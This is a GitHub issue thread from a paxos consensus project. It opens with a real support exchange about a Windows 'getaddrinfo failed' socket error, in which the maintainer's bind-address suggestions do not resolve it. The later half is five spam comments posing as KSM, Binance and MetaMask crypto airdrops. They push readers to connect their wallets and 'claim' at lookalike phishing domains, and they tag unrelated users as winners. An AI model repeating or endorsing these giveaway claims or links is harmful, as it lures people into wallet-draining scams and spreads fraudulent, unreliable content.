### ISSUE TITLE
"getaddrinfo failed" error

### ISSUE THREAD

**Issue by sinaasadiyan** [AminTalebi/paxos#1]
This is the error when i run the code  on my pc :

socket.gaierror: [Errno 11001] getaddrinfo failed

but works well in Cloud like google colab, any solution for that?

**Comment by amintalebi** [comment]
Hi
Could you provide more information? What's your operating system?

BTW Sorry for no documentation.

**Comment by sinaasadiyan** [comment]
Thanks for fast reply .
on Windows 10 - Python 3.6.0 , this is the complete error :
i think sth is wrong with binding 

C:\Users\ACER\Desktop\paxos\paxos-main>py run.py
peer initialized successfully
peer initialized successfully
peer initialized successfully
Traceback (most recent call last):
  File "C:\Users\ACER\Desktop\paxos\paxos-main\sender.py", line 12, in __init__
    self.client = ClientSocket(mode=self.server_ip, port=int(self.server_port))
  File "C:\Users\ACER\Desktop\paxos\paxos-main\clientsocket.py", line 15, in __init__
    self._socket.connect((self.connect_ip, self.connect_port))
socket.gaierror: [Errno 11001] getaddrinfo failed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "run.py", line 24, in <module>
    nodes[uid].stream.add_sender(address, float(tokens[1]))
  File "C:\Users\ACER\Desktop\paxos\paxos-main\stream.py", line 31, in add_sender
    self.senders[tuple(server_address)] = Sender(server_address=server_address, delay=delay)
  File "C:\Users\ACER\Desktop\paxos\paxos-main\sender.py", line 15, in __init__
    raise ConnectionError('Client socket cannot be initialized')
ConnectionError: Client socket cannot be initialized

**Comment by amintalebi** [comment]
Unfortunately I don't have access to any windows device to test this but I guess It's related to the following part of the code.
serversocket.py

`self._socket.bind(('', 0))`

port zero assigns a random free port and '' address is localhost. You may need to change it to the one of followings to make it work on Windows. 

`self._socket.bind(('localhost', 0))` or `self._socket.bind(('127.0.0.1', 0))`.

Also you can change the code a little bit and pass address and port yourself.

**Comment by sinaasadiyan** [comment]
Changing to local host and 127.0.0.1 didn't work. thanks anyway .

**Comment by amintalebi** [comment]
Sorry to hear that. Feel free to submit a PR If you could fix the bug.

**Comment by sinaasadiyan** [comment]
Maybe parse_ip staticmethod parses ip in another type that does not match with the local IPs and TCP. i mean the way "zfill" works on ip and port

definatly .

**Comment by amintalebi** [comment]
Probably, I've never had the chance to run this code on windows machine and see its behavior. It's developed and tested on Linux devices.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwww.eth-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @vikrant1708, @cyans, @technoramus, @serinuntius, @Vadimchesh, @lixiaowei11111, @shanelau

**Comment by Allen0517** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @marcopiraccini, @Mafii, @Shorty1234567, @emil14, @ChinaSunHZ, @PauloFla009, @JiaBooBJUTFang
